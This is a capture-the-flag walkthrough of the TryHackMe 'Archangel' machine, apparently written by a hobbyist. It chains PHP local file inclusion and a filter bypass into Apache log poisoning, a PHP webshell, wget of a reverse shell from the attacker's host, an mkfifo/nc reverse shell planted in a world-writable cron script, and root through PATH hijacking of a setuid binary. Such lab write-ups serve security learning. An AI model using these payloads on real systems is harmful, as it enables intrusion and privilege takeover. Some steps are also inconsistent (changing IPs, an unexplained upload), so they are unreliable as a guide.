Enumeration


 

root@kali:~/tryhackme/archangle# nmap -sC -sV 10.10.169.125

Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-04 14:01 EST
Nmap scan report for mafialive.thm (10.10.169.125)
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9f:1d:2c:9d:6c:a4:0e:46:40:50:6f:ed:cf:1c:f3:8c (RSA)
|   256 63:73:27:c7:61:04:25:6a:08:70:7a:36:b2:f2:84:0d (ECDSA)
|_  256 b6:4e:d2:9c:37:85:d6:76:53:e8:c4:e0:48:1c:ae:6c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/test.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Navigating to the website, I see a normal looking website, however I see another hostname of mafialive.thm under Send us Mail

website

I add this hostname to my /etc/hosts file and navigate to the new website and the first flag.

flag1

Running gobuster on mafialive.thm I find test.php

root@kali:~/tryhackme/archangle# gobuster dir -u http://mafialive.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://mafialive.thm/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2021/02/04 14:08:16 Starting gobuster
===============================================================
/test.php (Status: 200)

Navigating to test.php I find a button

test

Pressing the button I find the URL changes to test.php?view=/var/www/html/development_testing/mrrobot.php

test1

Exploit


LFI PHP Wrappers

The URL shown can be vulnerable to several things, such as SQL injection, directory traversal, RFI and LFI. Testing one by one I find most of them end with a Not Allowed response.

notallowed

Testing PHP Wrappers for LFI, I find that it is possible to convert the page to base64

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php

base64

Trying to read /etc/passwd still fails, so I try to read the test.php file instead to see what filtering is happening

┌──(kali㉿kali)-[~/thm/archangel]
└─$ curl http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

<!DOCTYPE HTML>
<html>

<head>
<title>INCLUDE</title>
<h1>Test Page. Not to be Deployed</h1>

</button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
CQo8IURPQ1RZUEUgSFRNTD4KPGh0bWw+Cgo8aGVhZD4KICAgIDx0aXRsZT5JTkNMVURFPC90aXRsZT4KICAgIDxoMT5UZXN0IFBhZ2UuIE5vdCB0byBiZSBEZXBsb3llZDwvaDE+CiAKICAgIDwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iL3Rlc3QucGhwP3ZpZXc9L3Zhci93d3cvaHRtbC9kZXZlbG9wbWVudF90ZXN0aW5nL21ycm9ib3QucGhwIj48YnV0dG9uIGlkPSJzZWNyZXQiPkhlcmUgaXMgYSBidXR0b248L2J1dHRvbj48L2E+PGJyPgogICAgICAgIDw/cGhwCgoJICAgIC8vRkxBRzogdGhte2V4cGxvMXQxbmdfbGYxfQoKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICBpZihpc3NldCgkX0dFVFsidmlldyJdKSl7CgkgICAgaWYoIWNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcuLi8uLicpICYmIGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcvdmFyL3d3dy9odG1sL2RldmVsb3BtZW50X3Rlc3RpbmcnKSkgewogICAgICAgICAgICAJaW5jbHVkZSAkX0dFVFsndmlldyddOwogICAgICAgICAgICB9ZWxzZXsKCgkJZWNobyAnU29ycnksIFRoYXRzIG5vdCBhbGxvd2VkJzsKICAgICAgICAgICAgfQoJfQogICAgICAgID8+CiAgICA8L2Rpdj4KPC9ib2R5PgoKPC9odG1sPgoKCg== </div>
</body>

</html>

This gives a long base64 value. I save it to my machine then decrypt it

root@kali:~/tryhackme/archangle# cat base | base64 -d

<!DOCTYPE HTML>
<html>

<head>
    <title>INCLUDE</title>
    <h1>Test Page. Not to be Deployed</h1>
 
    </button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
        <?php

            //FLAG: thm{explo1t1ng_lf1}

            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
            if(isset($_GET["view"])){
            if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
                include $_GET['view'];
            }else{

                echo 'Sorry, Thats not allowed';
            }
        }
        ?>
    </div>
</body>

</html>

Log Poisoning

Looking at the base64 value decoded, I find that we are not allowed to use ../.. and we have to start our string with /var/www/html/development_testing. These are the only two conditions. A well known bypass for ../.. is to use a double backslash which we are allowed to do.

I test the double backslash to see if I can read /etc/passwd.

┌──(kali㉿kali)-[~/thm/archangel]
└─$ curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//..//etc/passwd | html2text
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1645 100 1645 0 0 24191 0 --:--:-- --:--:-- --:--:-- 24191

****** Test Page. Not to be Deployed ******
Here_is_a_button
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:
x:4:65534:sync:/bin:/bin/sync --snp--
nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin uuidd:x:105:109::/run/
uuidd:/usr/sbin/nologin sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
archangel:x:1001:1001:Archangel,,,:/home/archangel:/bin/bash

┌──(kali㉿kali)-[~/thm/archangel]

I can now use this to search the box. Looking for SSH keys do not work and I can’t read any useful files, so I try log poisoning. First, I need to find where the logs are stored. Testing the default places, I find /var/log/apache2/access.log contains all logs for the HTTP server.

view-source:http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log

log

Scrolling to the bottom of this log file, I see all of my requests through the LFI vulnerable.

log1

I know that my requests are logged to this file, which means I can insert PHP code and then execute it on /var/log/apache2/access.log To start, I use a simple PHP shell code and insert it at the user agent

User-Agent: <?php system($_GET['cmd']); ?>

Refreshing access.log, I see my php code is now in the log file

I can now test command execution

so i uploaded 1st puck.php

GIF8
<?php echo system($_REQUEST['puck']); ?>

2nd  i accessed

┌──(kali㉿kali)-[~/thm]
└─$ curl http://mafialive.thm/puck.php?puck=ls 127 ⨯
GIF8
index.html
mrrobot.php
puck.php
puck.php.1

3th i runned

┌──(kali㉿kali)-[~/thm]
└─$ curl http://mafialive.thm/puck.php?puck=wget+http%3a//10.9.2.255%3a8000/rev.php 
GIF8
┌──(kali㉿kali)-[~/thm/archangel]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.191.165 - - [22/Jul/2021 04:51:25] "GET /rev.php HTTP/1.1" 200 -

4th i runned and got the shell

┌──(kali㉿kali)-[~/thm]
└─$ curl http://mafialive.thm/rev.php
┌──(kali㉿kali)-[~/thm]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.9.2.255] from (UNKNOWN) [10.10.191.165] 39902
Linux ubuntu 4.15.0-123-generic #126-Ubuntu SMP Wed Oct 21 09:40:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
14:23:51 up 2:24, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

.

Since I can execute commands, I can upload files. Using a PHP Reverse Shell I can upload this file and then navigate to it. I setup up a python HTTP Server on my local machine then use wget to upload the file

I first import python3 into the shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/archangle# stty raw -echo
root@kali:~/tryhackme/archangle# fg

www-data@ubuntu:/$

I can now read the second flag

flag2

Exploiting archangel User


To start, I uploaded and ran linpeas.sh

www-data@ubuntu:/tmp$ wget 10.2.8.75/linpeas.sh

--2021-02-05 01:43:42--  http://10.2.8.75/linpeas.sh
Connecting to 10.2.8.75:80... connected.
HTTP request sent, awaiting response... 200 OK                                                                                                                                              
Length: 229696 (224K) [text/x-sh]                                                             
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 224.31K  61.4KB/s    in 3.7s

2021-02-05 01:43:47 (61.4 KB/s) - 'linpeas.sh' saved [229696/229696]
                                               
www-data@ubuntu:/tmp$ bash linpeas.sh 

Looking through the results, I find a cronjob for the archangel user

[+] Cron jobs 

.............................................

*/1 *   * * *   archangel /opt/helloworld.sh   	

Checking out this file, I see it runs a basic echo script.

www-data@ubuntu:/opt$ cat helloworld.sh 
#!/bin/bash
echo "hello world" >> /opt/backupfiles/helloworld.txt

Looking at the permissions, I find everyone has permission to write to this file

www-data@ubuntu:/opt$ ls -la helloworld.sh 
-rwxrwxrwx 1 archangel archangel 66 Nov 20 10:35 helloworld.sh

Since I can write to the file, I put in a reverse shell

www-data@ubuntu:/opt$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.8.75 1234 >/tmp/f" > helloworld.sh

After setting up a netcat listener and waiting for a few moments, I get a connect back as archangel

root@kali:~/tryhackme/archangle# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.166.10] 40080
/bin/sh: 0: can't access tty; job control turned off

$ whoami
archangel

Again, I import python3 into the shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
archangel@ubuntu:~$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/archangle# stty raw -echo
root@kali:~/tryhackme/archangle# fg

archangel@ubuntu:~$ 

Now, I can read the 3rd flag

flag3

Privilege Escalation to root


Under the secrets folder, I find a file named backup. Looking into this file, I find it is an ELF executable owned by root but can be executed by anyone

archangel@ubuntu:~/secret$ file backup 
backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=9093af828f30f957efce9020adc16dc214371d45, for GNU/Linux 3.2.0, not stripped

archangel@ubuntu:~/secret$ ls -la backup 
-rwsr-xr-x 1 root root 16904 Nov 18 16:40 backup

I would like to know what this executable does, so I run strings against it. Here I find that it copies all files in the myfiles folder using cp.

archangel@ubuntu:~/secret$ strings backup 
/lib64/ld-linux-x86-64.so.2
setuid        
system      
__cxa_finalize                           
setgid                                                                                        
__libc_start_main          
libc.so.6
GLIBC_2.2.5        
_ITM_deregisterTMCloneTable
__gmon_start__           
_ITM_registerTMCloneTable
u+UH                       
[]A\A]A^A_
cp /home/user/archangel/myfiles/* /opt/backupfiles

This does not use the full path for cp, which means it is vulnerable to a Path Variable Privilege Escalation. By default on linux, most variables are under sbin or bin. However we can create our own path and variable for cp so when we execute this file, it will execute the CP located in our path.

To start, we must craft a file named cp. I did this under the /tmp directory

archangel@ubuntu:/tmp$ echo "/bin/bash" > cp
archangel@ubuntu:/tmp$ chmod 777 cp

Now, I need to change my PATH variable to /tmp

archangel@ubuntu:/tmp$ export PATH=/tmp:$PATH

With my path changed, when I execute backup, it will look for the cp file under the tmp directory and execute it. Since root owns the file, root will excute it

archangel@ubuntu:/tmp$ ~/secret/backup 
root@ubuntu:/tmp# 

As root, I can now read the final flag

root